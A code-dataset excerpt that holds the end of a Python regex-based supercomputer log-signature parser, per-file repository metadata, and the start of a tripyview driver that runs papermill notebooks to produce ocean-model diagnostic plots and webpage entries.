r"^R_DDR_STR TIME_STAMP SHORT_DATE NODE_ID_01 DATE_TIME NODE_ID_01 RAS KERNEL INFO {ddr_unable_to_steer_rank_already_steering}$".format(ddr_unable_to_steer_rank_already_steering=ddr_unable_to_steer_rank_already_steering),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY (WARNING|SEVERE) While initializing .+? card.*?$".format(LP_ADDRESS=LP_ADDRESS),
r"^- TIME_STAMP SHORT_DATE UNKNOWN_LOCATION DATE_TIME UNKNOWN_LOCATION NULL DISCOVERY (WARNING|SEVERE) Problem communicating with node card, iDo machine with LP of {LP_ADDRESS} caught java.lang.IllegalStateException: while executing .+? Operation .*?$".format(LP_ADDRESS=LP_ADDRESS),
]
# initializing_node_caught_exception
# compile regular expression for faster execution (patterns get cached)
signatures_by_id = {}
for pattern_id, pattern in enumerate(KNOWN_LOGLINE_PATTERN):
try:
KNOWN_LOGLINE_PATTERN[pattern_id]=re.compile(pattern, re.IGNORECASE)
signatures_by_id[pattern_id+1]=pattern # pattern_id + 1 because 0 is reserved
except :
print(pattern_id, pattern)
def extract_pattern_id(message):
for pattern_id, pattern in enumerate(KNOWN_LOGLINE_PATTERN):
#print message, pattern
if re.search(pattern, message):
return pattern_id+1 # pattern_id + 1 because 0 is reserved
return 0 # no pattern to parse log line, unknown message
# Print iterations progress
def print_progress (iteration, total, prefix = '', suffix = '', decimals = 2, barLength = 100):
import sys
filledLength = int(round(barLength * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
bar = '#' * filledLength + '-' * (barLength - filledLength)
sys.stdout.write('%s [%s] %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
print("\n")
if __name__ == '__main__':
import time
# parse command line arguments
parser = argparse.ArgumentParser(description='Parses logfile, prints first line that does not match one of the known regex')
parser.add_argument('-if', '--in_file', type=str, default="bgl2_clean_workingcopy.log", help='')
parser.add_argument('-t', '--truncate', type=bool, default=False, help='')
parser.add_argument('-pd', '--print_duplicates', type=bool, default=False, help='')
parser.add_argument('-c', '--clean', type=bool, default=False, help='' )
parser.add_argument("-ds","--dataset_statistics", type=bool, default=False, help="" )
parser.add_argument("-ss","--show_sorted", type=bool, default=False, help="")
args = parser.parse_args()
total_lines = 4747954.0
one_percent_of_lines = int(total_lines/100)
if args.clean:
of = open("%s_clean"%args.in_file, "w")
with open("%s"%args.in_file,"r") as logs:
for i,log_line in enumerate(logs):
split_line = log_line.split(" ")
split_line[1] = "TIME_STAMP"
split_line[2] = "SHORT_DATE"
if split_line[3]=="NULL":
node_id = "NULL"
elif split_line[3]=="UNKNOWN_LOCATION":
node_id = "UNKNOWN_LOCATION"
elif re.search(r"R\d{2}-M\d-N\w-\w:J\d{2}-U\d{2}",split_line[3]):
node_id = "NODE_ID_01"
elif re.search(r"R\d{2}-M\d-L\d-U\d{2}-\w",split_line[3]):
node_id = "NODE_ID_02"
elif re.search(r"R\d{2}-M\d-?[NL]?\w?",split_line[3]):
node_id = "NODE_ID_03"
else:
node_id = split_line[3]
if split_line[3]==split_line[5]:
split_line[3]=node_id
split_line[5]=node_id
split_line[4]="DATE_TIME"
if i % one_percent_of_lines ==0 : print("%i lines processed, %.2f done "%(i,100*i / total_lines ))
of.write(" ".join(split_line))
of.close()
elif args.truncate and False:
matched_lines = 0
of = open("bgl2_clean_workingcopy_new.log", "w")
with open("bgl2.log","r") as logs:
for i,log_line in enumerate(logs):
if i % one_percent_of_lines ==0 : print("%i lines processed, %.2f done "%(i,100*i / total_lines ))
if extract_pattern_id(log_line) == 0:
of.write(log_line)
else:
matched_lines+=1
of.close()
import os
os.remove("bgl2_clean_workingcopy.log")
os.rename("bgl2_clean_workingcopy_new.log","bgl2_clean_workingcopy.log")
print("{} signatures matched {} lines, {:.3f}% done.".format(len(KNOWN_LOGLINE_PATTERN), matched_lines, 100*matched_lines / total_lines ))
elif args.print_duplicates and True:
lines_with_more_signatures = {}
log_lines_with_no_signatures = []
with open("bgl2.log","r") as logs:
total_ops = 4747954 * len(KNOWN_LOGLINE_PATTERN)
current_op = 0
for line_id,log_line in enumerate(logs):
line_signatures=[]
if line_id==0:
s = time.time()
if line_id==10000:
print("Estimated duration: ~ %.2f h"%( (4747954 * (time.time() -s)/10000.0)/3600.0 ) )
for pattern_id, pattern in enumerate(KNOWN_LOGLINE_PATTERN):
current_op+=1
# print_progress(current_op, total_ops, " regex duplication checks finished")
matches = re.search(pattern, log_line)
if matches:
line_signatures.append(pattern_id+1)
if len(line_signatures)==0:
log_lines_with_no_signatures.append(log_line)
print("No pattern matched: %s"%log_line)
if len(line_signatures)>1:
lines_with_more_signatures[line_id] = (log_line, line_signatures, [KNOWN_LOGLINE_PATTERN[s-1] for s in line_signatures] )
print("More pattern matched: %s"%log_line)
print(log_lines_with_no_signatures)
with open("no_signatures.json","w") as f:
json_string = json.dumps(log_lines_with_no_signatures)
f.write(json_string)
print(lines_with_more_signatures)
with open("more_signatures.json","w") as f:
json_string = json.dumps(lines_with_more_signatures)
f.write(json_string)
elif args.dataset_statistics and True:
with open("bgl2.log","r") as logs:
counts = [0]*(len(KNOWN_LOGLINE_PATTERN)+1)
for i, log_line in enumerate(logs):
if i%500==0:
print_progress(i, total_lines, " counting dataset statistics")
pid = extract_pattern_id(log_line)
counts[pid]+=1
print("Min: %i"%min(counts))
print("Max: %i"%max(counts))
print("Lower Quartile %.2f"%np.percentile(counts, 25))
print("Median: %.2f"%np.median(counts))
print("Upper Quartile %.2f"%np.percentile(counts, 75))
print("Std: %0.2f"%np.std(counts))
with open("counts.json","w") as f:
json_coutns_str = json.dumps(counts)
f.write(json_coutns_str)
elif args.show_sorted:
for p in sorted([kp.pattern for kp in KNOWN_LOGLINE_PATTERN]):
print(p)
print( "Pattern: %i"%len(KNOWN_LOGLINE_PATTERN))
else:
s = time.time()
total_lines = 736.0
matched_lines = 0
with open(args.in_file,"r") as logs:
for line_id, log_line in enumerate(logs):
print_progress(line_id, total_lines, "Finding non matching signatures...")
if extract_pattern_id(log_line) == 0:
print("{} signatures matched {} lines, {} lines left, {:.3f}% done.".format(len(KNOWN_LOGLINE_PATTERN), matched_lines, int(total_lines-matched_lines), 100*matched_lines / total_lines ))
print("Line that did not match:\n")
print(log_line)
copy2clip(log_line)
break
else:
if line_id % one_percent_of_lines == 0 : print("%i lines processed, %.2f done "%(line_id,100*line_id / total_lines ))
matched_lines+=1
e = time.time()
print("Took %i seconds."%(e-s))
| 116.442767
| 835
| 0.752733
| 14,739
| 92,572
| 4.439582
| 0.072461
| 0.072255
| 0.082402
| 0.115535
| 0.794697
| 0.770077
| 0.748086
| 0.7299
| 0.701291
| 0.682907
| 0
| 0.044875
| 0.12089
| 92,572
| 794
| 836
| 116.589421
| 0.759182
| 0.07256
| 0
| 0.04784
| 0
| 0.225309
| 0.717284
| 0.091342
| 0
| 0
| 0.000657
| 0
| 0.006173
| 1
| 0.00463
| false
| 0
| 0.015432
| 0
| 0.024691
| 0.044753
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e410f4eac7b94b3b990f2e3c62fa5143d1e44ae
| 56,657
|
py
|
Python
|
tripyview/sub_diagdriver.py
|
patrickscholz/tripyview
|
14c232d840db2e879d79b3e3b3286a6962211c47
|
[
"MIT"
] | null | null | null |
tripyview/sub_diagdriver.py
|
patrickscholz/tripyview
|
14c232d840db2e879d79b3e3b3286a6962211c47
|
[
"MIT"
] | null | null | null |
tripyview/sub_diagdriver.py
|
patrickscholz/tripyview
|
14c232d840db2e879d79b3e3b3286a6962211c47
|
[
"MIT"
] | null | null | null |
import yaml
import papermill as pm
import math
import pkg_resources
from jinja2 import Environment, FileSystemLoader
import yaml
import argparse
import json
import glob
import shutil
import sys
import os
#_______________________________________________________________________________
# open htnl template file
#try: pkg_path = os.environ['PATH_TRIPYVIEW']
#except: pkg_path=''
pkg_path = os.path.dirname(os.path.dirname(__file__))
templates_path = os.path.join(pkg_path,'templates_html')
templates_nb_path = os.path.join(pkg_path,'templates_notebooks')
file_loader = FileSystemLoader(templates_path)
env = Environment(loader=file_loader)
#
#
#_______________________________________________________________________________
def drive_hslice(yaml_settings, analysis_name):
print(' --> drive_hslice:',analysis_name)
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
#___________________________________________________________________________
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
which_mon = ''
which_mon2 = ''
if 'mon' in driver_settings[vname].keys():
which_mon = f"_m{driver_settings[vname]['mon']}"
which_mon2 = f" @ mon:{driver_settings[vname]['mon']}"
#_______________________________________________________________________
# loop over depths
for depth in driver_settings[vname]["depths"]:
print(f' --> depth: {depth}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["depth"] = depth
current_params2.update(driver_settings[vname])
del current_params2["depths"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
#___________________________________________________________________
# make no loops over the months
if 'months' not in driver_settings[vname].keys():
#_______________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hslice.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,)
#_______________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{auxvname.capitalize()} @dep:{depth}m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
#___________________________________________________________________
# make loops over the single months
else:
#_______________________________________________________________
# loop over depths
del current_params2["months"]
for month in driver_settings[vname]["months"]:
print(f' --> mon: {month}')
current_params2["mon"] = month
current_params2.update(driver_settings[vname])
#___________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}_m{month}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}_m{month}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{current_params2['proj']}_{depth}_m{month}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}_m{month}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}_m{month}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{depth}_m{month}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hslice.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,)
#___________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{auxvname.capitalize()} @dep:{depth}m, @mon:{month}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_hslice_clim(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute:{vname}')
# loop over depths
for depth in driver_settings[vname]["depths"]:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["depth"] = depth
current_params2.update(driver_settings[vname])
del current_params2["depths"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
# print(current_params2)
#___________________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{current_params2['proj']}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{current_params2['proj']}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{current_params2['proj']}_{depth}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{depth}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{depth}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{depth}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hslice_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.capitalize()} at {depth} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_hovm(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
auxvname = vname.replace('/',':')
# loop over depths
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hovm.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{auxvname.capitalize()} at {str_boxregion} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{auxvname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_hovm_clim(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
# loop over depths
for box_region in driver_settings[vname]["box_regions"]:
print(f' --> compute: {box_region}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
current_params2["box_region"] = list([box_region])
current_params2.update(driver_settings[vname])
del current_params2["box_regions"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
str_boxregion = box_region.split('/')[-1].split('.')[0]
#___________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#___________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_hovm_clim.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#___________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"][
"name"
] = f"{vname.capitalize()} at {str_boxregion} m"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"][
"short_name"
] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}_{str_boxregion}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_xmoc(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
# current_params2.update(driver_settings[vname])
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_xmoc.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{vname.upper()}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_xmoc_tseries(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for which_lat in driver_settings['which_lats']:
print(f' --> compute tseries @: {str(which_lat)}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_lat"] = [which_lat]
current_params2.update(driver_settings)
del current_params2["which_lats"]
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_xmoc_tseries.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
if which_lat == 'max':
webpage[f"image_{image_count}"]["name"] = f" max AMOC @ 30°N<lat<45°N"
else:
webpage[f"image_{image_count}"]["name"] = f" AMOC @ {which_lat}°N"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for vname in driver_settings:
print(f' --> compute: {vname}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["vname"] = vname
if analysis_name == 'dmoc' :
current_params2["which_transf"], str_mode = 'dmoc' , ''
elif analysis_name == 'dmoc_srf' :
current_params2["which_transf"], str_mode = 'srf' , '_srf'
elif analysis_name == 'dmoc_inner':
current_params2["which_transf"], str_mode = 'inner', '_inner'
elif analysis_name == 'dmoc_z':
current_params2["which_transf"], str_mode = 'dmoc', '_z'
current_params2["do_zcoord"] = True
elif analysis_name == 'dmoc_srf_z' :
current_params2["do_zcoord"] = True
current_params2["which_transf"], str_mode = 'srf' , '_srf_z'
elif analysis_name == 'dmoc_inner_z':
current_params2["which_transf"], str_mode = 'inner', '_inner_z'
current_params2["do_zcoord"] = True
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"Density-{vname.upper()}{str_mode}"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{vname}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc_tseries(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over variable name
for which_lat in driver_settings['which_lats']:
print(f' --> compute tseries @: {which_lat}')
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_lat"] = [which_lat]
current_params2.update(driver_settings)
del current_params2["which_lats"]
#_______________________________________________________________________
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}.ipynb"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc_tseries.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
if which_lat == 'max':
webpage[f"image_{image_count}"]["name"] = f" max density-AMOC @ 45°N<lat<60°N"
else:
webpage[f"image_{image_count}"]["name"] = f" density AMOC @ {which_lat}°N"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_lat}"
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc_wdiap(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over diffrent ispycnals
for which_isopyc in driver_settings['which_isopycs']:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_isopyc"] = [which_isopyc]
current_params2.update(driver_settings)
del current_params2["which_isopycs"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
#_______________________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
f"{templates_nb_path}/template_dmoc_wdiap.ipynb",
os.path.join(yaml_settings['save_path_nb'], save_fname_nb),
parameters=current_params2,
nest_asyncio=True,
)
#_______________________________________________________________________
webpage[f"image_{image_count}"] = {}
webpage[f"image_{image_count}"]["name"] = f"{'W_diap'} at sigma2={which_isopyc} kg/m^3"
webpage[f"image_{image_count}"]["path"] = os.path.join('./figures/', save_fname)
webpage[f"image_{image_count}"]["path_nb"] = os.path.join('./notebooks/', save_fname_nb)
webpage[f"image_{image_count}"]["short_name"] = short_name
image_count += 1
return webpage
#
#
#_______________________________________________________________________________
def drive_dmoc_srfcbflx(yaml_settings, analysis_name):
# copy yaml settings for analysis driver --> hslice:
#
driver_settings = yaml_settings[analysis_name].copy()
# create current primary parameter from yaml settings
current_params = {}
for key, value in yaml_settings.items():
# if value is a dictionary its not a primary paramter anymore e.g.
# hslice: --> dict(...)
# temp:
# levels: [-2, 30, 41]
# depths: [0, 100, 400, 1000]
# ....
if isinstance(value, dict):
pass
else:
current_params[key] = value
# initialse webpage for analyis
webpage = {}
image_count = 0
# loop over diffrent ispycnals
for which_isopyc in driver_settings['which_isopycs']:
current_params2 = {}
current_params2 = current_params.copy()
current_params2["which_isopyc"] = [which_isopyc]
current_params2.update(driver_settings)
del current_params2["which_isopycs"] # --> delete depth list [0, 100, 1000,...] from current_param dict()
#_______________________________________________________________________
if 'proj' in current_params2.keys():
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{current_params2['proj']}_{which_isopyc}"
else:
save_fname = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.png"
save_fname_nb = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}.ipynb"
short_name = f"{yaml_settings['workflow_name']}_{analysis_name}_{which_isopyc}"
current_params2["save_fname"] = os.path.join(yaml_settings['save_path_fig'], save_fname)
#_______________________________________________________________________
pm.execute_notebook(
